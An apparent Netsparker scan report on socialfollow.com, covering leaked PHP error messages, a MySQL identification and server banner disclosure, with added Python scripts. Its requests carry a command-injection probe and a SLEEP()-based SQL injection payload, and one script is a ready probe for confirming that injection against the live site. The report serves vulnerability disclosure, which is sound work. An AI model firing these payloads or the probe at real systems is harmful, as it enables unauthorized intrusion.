menu=this.menusmap[targetclass+pos]={id:targetclass+pos,anchorobj:anchorobj,dropmenu:dropmenu,revealtype:(relattr.length!=dropmenuid.length&&RegExp.$1=="click")?"click":"mouseover",orientation:anchorobj.getAttribute("rev")=="lr"?"lr":"ud",shadow:this.addDiv(null,"anylinkshadow",null)}menu.anchorobj._internalID=targetclass+pos;menu.anchorobj._isanchor=true;menu.dropmenu._internalID=targetclass+pos;menu.shadow._internalID=targetclass+pos;menu.dropmenu.setcss=this.setcss;menu.shadow.style.display="none";menu.shadow.setcss=this.setcss;menu.shadow.setcss({display:"block"});this.setopacity(menu.shadow,this.effects.shadow.opacity);this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="mouseover"&&!socialfollow.isContained(this,e)){socialfollow.showmenu(menu.id);}else if(typeof this._isanchor=="undefined"){clearTimeout(menu.hidetimer);}},"mouseover");this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){if(!socialfollow.isContained(this,e)){var menu=socialfollow.menusmap[this._internalID];menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"mouseout");this.addEvent([menu.anchorobj,menu.dropmenu],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="click"){if(menu.dropmenu.style.visibility=="visible"){socialfollow.hidemenu(menu.id);}else{socialfollow.showmenu(menu.id);}if(e.preventDefault){e.preventDefault();}return false}else{menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"click");},init:function(targetclass){var headID=document.getElementsByTagName("head")[0];var cssNode=document.createElement('link');cssNode.type='text/css';cssNode.rel='stylesheet';cssNode.href='http://www.socialfollow.com/button/css/?b=&n=&socialSites=';cssNode.media='screen';headID.appendChild(cssNode);var 
imgs=this.getElementsByClass(targetclass);for(var i=0;i<imgs.length;i++){if('done'!=imgs[i].getAttribute('rel')){imgs[i].setAttribute('rel','done');this.setupmenu(targetclass,imgs[i],i);this.border="0";var hidden_divs=this.getElementsByClass('show');setTimeout(function(){for(var i=0;i<hidden_divs.length;i++){if('undefined'!=typeof(hidden_divs[i].style))hidden_divs[i].style.display='';}},200);}}}}function openwindow(url){document.body.removeChild(document.getElementById('popup'));document.body.removeChild(document.getElementById('popup1'));window.open(url);}function check_browser(){var re=/\s+(X?HTML)\s+([\d\.]+)\s*([^\/]+)*\/(?:[^"]+"\s"([^"]+)")?/gi;var res=false;metaCollection=document.getElementsByTagName('meta');for(i=0;i<metaCollection.length;i++){if('X-UA-Compatible'==metaCollection[i].httpEquiv&&'IE=EmulateIE7'==metaCollection[i].content)return false;}if(typeof document.namespaces!="undefined"){res=(8==document.all[0].nodeType)?re.test(document.all[0].nodeValue):false;}else{res=(null!=document.doctype)?re.test(document.doctype.publicId):false;}if(res){res=new Object();var type=RegExp.$1;var version=RegExp.$2;var doctype_extended=RegExp.$3.toLowerCase();var doctype_url=RegExp.$4if((/strict\.dtd/.test(doctype_url)||'strict'==doctype_extended)||(('HTML'==type&&'4.01'==version)&&!/http:\/\//.test(doctype_url)))return false;return(('XHTML'==type&&'1.0'==version)||('HTML'==type&&'4.01'==version))?true:false;return result;}else{return false;}}
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message. The b parameter carried one of the scanner's blind command injection probes ("& ping -n 26 127.0.0.1 &), and the response shows no sign that the command ran; what it does show is how /button/image/index.php fails when the lookup for b returns nothing: mysql_fetch_assoc() warns at line 3, the three header-setting calls at lines 5 to 7 fail because output had already started, and line 8 calls file_get_contents() on ../../images/button/.gif, a path assembled from the empty lookup result. Every warning repeats the script's absolute filesystem path.

Impact

The error message may disclose sensitive information such as source code fragments, stack traces and file paths, which an attacker can use to mount new attacks or to enlarge the attack surface. Most of these issues are identified and reported separately by Netsparker.

Remedy

Do not display error messages in production (display_errors = Off and log_errors = On in php.ini). Validate b before it reaches the query, check that the query succeeded before calling mysql_fetch_assoc(), and refuse to build a file path from an empty or unexpected lookup result instead of letting file_get_contents() report which path it tried. Save the full message with a reference number to backend storage such as a log, text file or database, then show the user only that number and a static, user-friendly error message.
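The following Python script is an added example, not code from the Netsparker report or from the site, and serves both this finding and the Database Error Message finding above. It parses PHP's html_errors-style warning text out of a response body, recovers the function, script path and line from each warning, classifies database versus filesystem failures, collects the absolute paths disclosed, and flags bodies in which the warning precedes the real output (the /button/ response above is a text/javascript file that no longer parses). The two sample bodies are constructed, shortened copies of the responses captured in the two findings; the function lists used for classification are an assumption.

```python
"""Triage PHP warnings leaked in HTTP response bodies.

Added example; not part of the Netsparker report or the site's code.
Parses the warning text captured in the Database Error Message and
Programming Error Message findings, recovers function, script and line
from each warning, and lists what the server disclosed.
"""
import html
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed samples: shortened copies of the two response bodies in this report.
BUTTON_BODY = (
    "<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL "
    "result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/"
    "social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify "
    "header information-headers already sent by(output started at/var/www/vhosts/"
    "socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/"
    "socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>"
    "var menu={divclass:'sociallinks'};"  # the JavaScript the endpoint meant to serve
)
IMAGE_BODY = (
    "<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid "
    "MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/"
    "image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify "
    "header information - headers already sent by (output started at /var/www/vhosts/"
    "socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/"
    "socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br />"
    "<br /><b>Warning</b>: file_get_contents(../../images/button/.gif) "
    "[<a href='function.file-get-contents'>function.file-get-contents</a>]: failed "
    "to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/"
    "httpdocs/button/image/index.php</b> on line <b>8</b><br />"
)

# PHP html_errors layout: <b>Level</b>: message in <b>/file</b> on line <b>N</b>.
# Whitespace is optional because the report shows one body with its spaces stripped.
WARNING_RE = re.compile(
    r"<b>(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error)</b>:\s*"
    r"(?P<message>.*?)\s*in\s*<b>(?P<file>[^<]+)</b>\s*on line\s*<b>(?P<line>\d+)</b>",
    re.DOTALL,
)
FUNC_RE = re.compile(r"^([A-Za-z_]\w*)\(([^)]*)\)")       # leading "func(arg)"
OUTPUT_AT_RE = re.compile(r"output started at\s*(/[^:)]+):\d+")
TAG_RE = re.compile(r"<[^>]+>")

# Assumed classification lists; extend for other database drivers or file APIs.
DB_PREFIXES = ("mysql_", "mysqli_", "pg_", "oci_", "sqlite_", "PDO")
FILE_FUNCS = {"file_get_contents", "file_put_contents", "fopen", "file", "readfile",
              "include", "include_once", "require", "require_once", "opendir"}


@dataclass
class PhpWarning:
    level: str
    message: str                # tags stripped, entities decoded
    file: str                   # absolute path of the failing script
    line: int
    function: Optional[str]     # PHP function named at the start of the message
    argument: Optional[str]     # its argument as echoed by PHP, e.g. a file path
    category: str               # "database", "filesystem" or "other"


def categorize(function: Optional[str]) -> str:
    if function is None:
        return "other"
    if function.startswith(DB_PREFIXES):
        return "database"
    if function in FILE_FUNCS:
        return "filesystem"
    return "other"


def parse_php_warnings(body: str) -> List[PhpWarning]:
    """Return every PHP warning/notice embedded in a response body, in order."""
    found: List[PhpWarning] = []
    for m in WARNING_RE.finditer(body):
        message = html.unescape(TAG_RE.sub("", m.group("message")))
        fm = FUNC_RE.match(message)
        function = fm.group(1) if fm else None
        argument = fm.group(2) if fm and fm.group(2) else None
        found.append(PhpWarning(m.group("level"), message, m.group("file"),
                                int(m.group("line")), function, argument,
                                categorize(function)))
    return found


def leaked_paths(warnings: List[PhpWarning]) -> Set[str]:
    """Absolute server paths disclosed, including 'output started at' references."""
    paths = {w.file for w in warnings}
    for w in warnings:
        paths.update(OUTPUT_AT_RE.findall(w.message))
    return paths


def starts_with_error(body: str) -> bool:
    """True when PHP wrote the warning before the script's own output, which
    breaks a JavaScript or image response for every client that embeds it."""
    return body.lstrip().lower().startswith(("<br", "<b>"))
```

Feed it stored response bodies from a crawl or proxy log; a non-empty result from parse_php_warnings() on a production host means display_errors is still on, and a "filesystem" entry whose argument was built from request data is the one to hand to a human reviewer first.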
- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Parameters

Parameter Type Value
b GET "& ping -n 26 127.0.0.1 &

Identified Error Message

  • <b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b>
  • <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b>
  • <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b>
  • <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b>
  • <b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b>

Request

GET /button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
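
The warnings above are what the Programming Error Message and Internal Path Leakage checks feed on. As an added example, not code from the Netsparker report, the script below parses the response body into structured warnings, collects the absolute paths it leaks (the document root /var/www/vhosts/socialfollow.com/httpdocs) and reads two things off the failing calls: mysql_fetch_assoc() received no result handle, so the query that carried the quoted payload failed, and file_get_contents() was handed ../../images/button/.gif with an empty file name, which means the image path is assembled from that query's output. The sample body is a constructed copy of three of the five warning lines.

```python
import re
from dataclasses import dataclass

# Constructed sample: three of the warning lines from the /button/image/ response
# above, with the HTML that PHP's display_errors emits left in place.
SAMPLE_BODY = (
    "<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL "
    "result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> "
    "on line <b>3</b><br />"
    "<br /><b>Warning</b>: Cannot modify header information - headers already sent by "
    "(output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) "
    "in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br />"
    "<br /><b>Warning</b>: file_get_contents(../../images/button/.gif) "
    "[<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: "
    "No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> "
    "on line <b>8</b><br />"
)

TAG_RE = re.compile(r"<[^>]+>")
# display_errors layout: "<Level>: <message> in <file> on line <n>"
WARNING_RE = re.compile(
    r"(?P<level>Warning|Notice|Fatal error|Parse error): (?P<msg>.*?) "
    r"in (?P<file>/\S+?) on line (?P<line>\d+)"
)
# Leading "func(arg)" in a message, e.g. file_get_contents(../../images/button/.gif)
FUNC_RE = re.compile(r"^(?P<func>[A-Za-z_]\w*)\((?P<arg>[^)]*)\)")
# Absolute paths anywhere in the message text (the lookbehind skips ../ relatives)
ABS_PATH_RE = re.compile(r"(?<![\w./])/(?:[\w.-]+/)+[\w.-]+")


@dataclass(frozen=True)
class PhpWarning:
    level: str
    func: str     # PHP function named at the start of the message, or ""
    arg: str      # its echoed argument, or ""
    message: str
    file: str
    line: int


def parse_php_warnings(body: str) -> list:
    """Extract PHP warnings from an HTML response body (tags stripped first)."""
    text = TAG_RE.sub("", body)
    out = []
    for m in WARNING_RE.finditer(text):
        msg = m.group("msg")
        f = FUNC_RE.match(msg)
        out.append(PhpWarning(
            level=m.group("level"),
            func=f.group("func") if f else "",
            arg=f.group("arg") if f else "",
            message=msg,
            file=m.group("file"),
            line=int(m.group("line")),
        ))
    return out


def leaked_paths(warnings) -> set:
    """Filesystem paths disclosed: the 'in <file>' part plus any path echoed in the text."""
    paths = {w.file for w in warnings}
    for w in warnings:
        paths.update(ABS_PATH_RE.findall(w.message))
    return paths


def triage(warnings) -> dict:
    """What each failing call tells a tester about the code path behind the parameter."""
    notes = {}
    for w in warnings:
        if w.func == "mysql_fetch_assoc":
            notes["sql"] = (f"line {w.line}: query returned no result handle; with a quote "
                            "in the payload this points at input reaching the SQL unescaped")
        elif w.func == "file_get_contents":
            notes["file"] = (f"line {w.line}: reads {w.arg!r}; the empty file name shows the "
                             "path is assembled from the failed query's output")
    return notes
```

Run parse_php_warnings() over any captured body; leaked_paths() gives the set to cite under Internal Path Leakage, and triage() is the note a tester carries into the SQL injection and file-read follow-ups.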
Forbidden Resource

1 total, information, 1 confirmed

Access to this resource has been denied by the web server (HTTP 403). This is generally not a security issue and is reported here for information purposes: only the directory listing of /js/ is refused, while the files beneath it, such as the /js/flash-detect.js seen in this request's Referer, are still served.

Impact

There is no direct impact resulting from this issue. The 403 page does, however, repeat the full Apache, PHP, Suhosin, mod_ssl, OpenSSL and mod_perl version string in its footer, so the server runs with ServerSignature on and ServerTokens unrestricted; that banner is the same one the Server header carries on every response and is where a version-based exploit search starts.
- /js/

/js/ CONFIRMED

http://www.socialfollow.com/js/

Request

GET /js/ HTTP/1.1
Referer: http://www.socialfollow.com/js/flash-detect.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Content-Length: 387
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /js/ on this server.</p><hr><address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Server at www.socialfollow.com Port 80</address></body></html>
MySQL Database Identified

1 total, information, 1 confirmed

Netsparker identified that the target web site is using a MySQL server. This is generally not a security issue and is reported here for information purposes. The identification rests on the MySQL-specific SLEEP() function: the request below asks the database to pause for 25 seconds from inside the injected b parameter, and the endpoint still answers 200 with the button image, so the delay rather than the response body is the signal.

Impact

This issue is reported as additional information only; there is no direct impact arising from it. Knowing the dialect is still useful to an attacker, since it fixes which functions and comment syntax to use against an injection point.
- /button/image/

/button/image/ CONFIRMED

http://www.socialfollow.com/button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Request

GET /button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Last-Modified: Tue, 19 Apr 2011 20:18:40 -0500
Accept-Ranges: bytes
Content-Length: 1190
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: image/gif
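
What the report does not show is how the 25-second SLEEP() becomes a verdict, since the 200 OK and the image body are identical to a normal response. The script below is an added example, not part of the Netsparker report: it sends a control payload of the same shape and the SLEEP payload several times each, and confirms only when the delayed requests are consistently slower by most of the requested delay. The simulated transport, the control payload and the 0.8 threshold are my choices; against the live target the http_send transport would be used with the full 25 seconds.

```python
import re
import statistics
import time
import urllib.parse
import urllib.request
from typing import Callable

BASE_URL = "http://www.socialfollow.com/button/image/"


def payloads(sleep_seconds: float) -> dict:
    # Shape of the confirmed payload above: SLEEP(n) returns 0 after pausing n seconds,
    # so "OR SLEEP(n)=0" is true, and the trailing "-- " (the "+" in the URL) comments
    # out the rest of the statement. The control payload has the same shape and no delay.
    return {
        "control": "-111 OR 1=0 LIMIT 1-- ",
        "sleep": f"-111 OR SLEEP({sleep_seconds})=0 LIMIT 1-- ",
    }


def http_send(url: str, timeout: float = 90) -> bytes:
    # Live transport; the timeout must exceed the requested SLEEP or the probe reads as a failure.
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def make_simulated_send(vulnerable: bool) -> Callable[[str], bytes]:
    # Offline stand-in for the target (an assumption for the dry run): an injectable
    # backend honours SLEEP(); a fixed one ignores the parameter entirely.
    def send(url: str) -> bytes:
        b = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query).get("b", [""])[0]
        m = re.search(r"SLEEP\(([\d.]+)\)", b)
        if vulnerable and m:
            time.sleep(float(m.group(1)))
        return b"GIF89a"  # same image either way; only latency differs
    return send


def timed(send, url: str, value: str) -> float:
    t0 = time.perf_counter()
    send(url + "?b=" + urllib.parse.quote(value, safe=""))
    return time.perf_counter() - t0


def confirm_time_based(send, url=BASE_URL, sleep_seconds=25, rounds=3):
    """Return (confirmed, control_median, sleep_median) for a time-based probe."""
    p = payloads(sleep_seconds)
    control = [timed(send, url, p["control"]) for _ in range(rounds)]
    delayed = [timed(send, url, p["sleep"]) for _ in range(rounds)]
    c_med, d_med = statistics.median(control), statistics.median(delayed)
    # Confirmed only if the delayed median exceeds control by most of the requested
    # sleep AND every delayed request was slower than every control request, so one
    # slow control response or one fast delayed one cannot flip the verdict.
    confirmed = d_med >= c_med + 0.8 * sleep_seconds and min(delayed) > max(control)
    return confirmed, c_med, d_med


if __name__ == "__main__":
    # Dry run against the simulated backend with a short sleep; against the live
    # target call confirm_time_based(http_send) and keep the 25 s the report used.
    print(confirm_time_based(make_simulated_send(True), sleep_seconds=0.3, rounds=2))
```

Interleaving control and sleep requests, rather than sending all controls first, is a further refinement worth adding on a noisy link, since it spreads any load spike across both sets.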


E-mail Address Disclosure

1 total, information

Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be harvested by spam engines and used as usernames by brute-force tools. Valid addresses also make social engineering attacks easier to target.

Remedy

Use generic addresses such as contact@ or info@ for general communications and remove person-specific e-mail addresses from the web site; where a contact route is needed, use a submission form instead. Addresses that arrive through third-party scripts and plugins, such as a library's attribution comment, are still published by the site and should be stripped from the served output.

- /blog/c/future-features/

/blog/c/future-features/

http://www.socialfollow.com/blog/c/future-features/

Found E-mails

geoff@deconcept.com (the SWFObject author's address, carried in the library's attribution comment that the wp-cumulus widget writes into the page; see the response body below. It is not an address belonging to the site.)

Request

GET /blog/c/future-features/ HTTP/1.1
Referer: http://www.socialfollow.com/sitemap.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:33 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile="http://gmpg.org/xfn/11"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Future Features - Social Follow</title><meta name="blogcatalog" content="9BC9225160" /> <link rel="stylesheet" href="http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/style.css" type="text/css" media="screen" /><link rel="alternate" type="application/rss+xml" title="Social Follow RSS Feed" href="http://www.socialfollow.com/blog/feed/" /><link rel="alternate" type="application/atom+xml" title="Social Follow Atom Feed" href="http://www.socialfollow.com/blog/feed/atom/" /><link rel="pingback" href="http://www.socialfollow.com/blog/xmlrpc.php" /><link rel="icon" href="/favicon.ico" type="image/x-icon"/><!-- META Tags added by Add-Meta-Tags WordPress plugin. Get it at: http://www.g-loaded.eu/ --><meta name="keywords" content="future features" /><link rel="alternate" type="application/rss+xml" title="Social Follow &raquo; Future Features Category Feed" href="http://www.socialfollow.com/blog/c/future-features/feed/" /><link rel='stylesheet' id='wp-email-css' href='http://www.socialfollow.com/blog/wp-content/plugins/wp-email/email-css.css?ver=2.50' type='text/css' media='all' /><link rel='stylesheet' id='wp-polls-css' href='http://www.socialfollow.com/blog/wp-content/plugins/wp-polls/polls-css.css?ver=2.50' type='text/css' media='all' /><link rel='stylesheet' id='wp-postratings-css' href='http://www.socialfollow.com/blog/wp-content/plugins/wp-postratings/postratings-css.css?ver=1.50' type='text/css' media='all' /><script type='text/javascript' src='http://www.socialfollow.com/blog/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.socialfollow.com/blog/xmlrpc.php?rsd" /><link 
rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.socialfollow.com/blog/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Social Follow' href='http://www.socialfollow.com/blog/' /> <link rel="stylesheet" type="text/css" href="http://www.socialfollow.com/blog/index.php?ak_action=aktt_css&v=2.4" /> <script type="text/javascript" src="http://www.socialfollow.com/blog/index.php?ak_action=aktt_js&v=2.4"></script> <style type="text/css">.wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('http://www.socialfollow.com/blog/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8;}</style></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button selected">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper" class="clear"> <div id="page" class="clear"> <div id="green-border" 
class="round-top-left"> <div class="content"> <div class="narrowcolumn"> <h1 class="pagetitle">Future Features</h1> <div class="Chicklets" style="margin:7px 0px;"> <!-- AddThis Button BEGIN --> <script type="text/javascript"> var addthis_pub="socialfollow"; var addthis_feed="http://www.socialfollow.com/blog/feed/"; </script> <a href="http://www.addthis.com/feed.php?pub=socialfollow&h1=http://www.socialfollow.com/blog/feed/&t1=" onclick="return addthis_open(this, 'feed')" title="Subscribe to Social Follow" target="_blank"><img src="http://s7.addthis.com/static/btn/lg-feed-en.gif" width="125" height="16" alt="Subscribe to Social Follow" style="border:0"/></a> <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script> <!-- AddThis Button END --> </div> <br /> <div class="post-31 post type-post hentry category-future-features tag-rafferty-pendery tag-social-follow tag-social-follow-profiles tag-social-networking-profiles"> <br /> <small>Sunday, June 14th, 2009</small> <h2 id="post-31"><a href="http://www.socialfollow.com/blog/future-features/social-follow-profile-pages-coming-soon/" rel="bookmark" title="Permanent Link to Social Follow: Profile Pages Coming Soon">Social Follow: Profile Pages Coming Soon</a></h2> <div class="entry"> <div class="tweetmeme_button" style="float: left; margin-right: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Fwww.socialfollow.com%2Fblog%2Ffuture-features%2Fsocial-follow-profile-pages-coming-soon%2F&amp;source=SocialFollow&amp;style=normal" height="61" width="50" frameborder="0" scrolling="no"></iframe></div><p>Social Follow has been growing rapidly, giving us a strong base of people helping us find any bugs. At this point, the Social Follow system is solid with the functionality included. Thanks to everyone!</p><p>Onto the next phase: Profile pages. 
We are including the functionality of being able to have a profile page for each of the Social Follow buttons you manage in your accounts. This is going to be a basic profile page to help give more points for you to attract attention about you and your business.</p><p>We have all the functionality worked out, and are shooting for having it live this next weekend.</p><p>Stay tuned!</p><p>Rafferty Pendery<br />Social Follow</p> </div> <p class="postmetadata"><span class="black">Tags:</span> <a href="http://www.socialfollow.com/blog/tag/rafferty-pendery/" rel="tag">Rafferty Pendery</a>, <a href="http://www.socialfollow.com/blog/tag/social-follow/" rel="tag">Social Follow</a>, <a href="http://www.socialfollow.com/blog/tag/social-follow-profiles/" rel="tag">Social Follow Profiles</a>, <a href="http://www.socialfollow.com/blog/tag/social-networking-profiles/" rel="tag">Social networking profiles</a><br /> <span class="black">Posted in</span> <a href="http://www.socialfollow.com/blog/c/future-features/" title="View all posts in Future Features" rel="category tag">Future Features</a> | <a href="http://www.socialfollow.com/blog/future-features/social-follow-profile-pages-coming-soon/#respond" title="Comment on Social Follow: Profile Pages Coming Soon">Leave Comment</a></p> </div> <div class="navigation"> <div class="alignleft"></div> <div class="alignright"></div> </div> </div> <div id="sidebar"> <ul> <li id="social-follow" class="widget sf_widget"><h2 class="widgettitle">Social Follow</h2><!-- Start SocialFollow.com Button Code -->
<img src="http://www.socialfollow.com/button/image/?b=1" class="socialFollowImage" alt="Follow Me!" />

<script type="text/javascript" src="http://www.socialfollow.com/button/?b=1"></script>
<script type="text/javascript">socialfollow.init("socialFollowImage");</script>
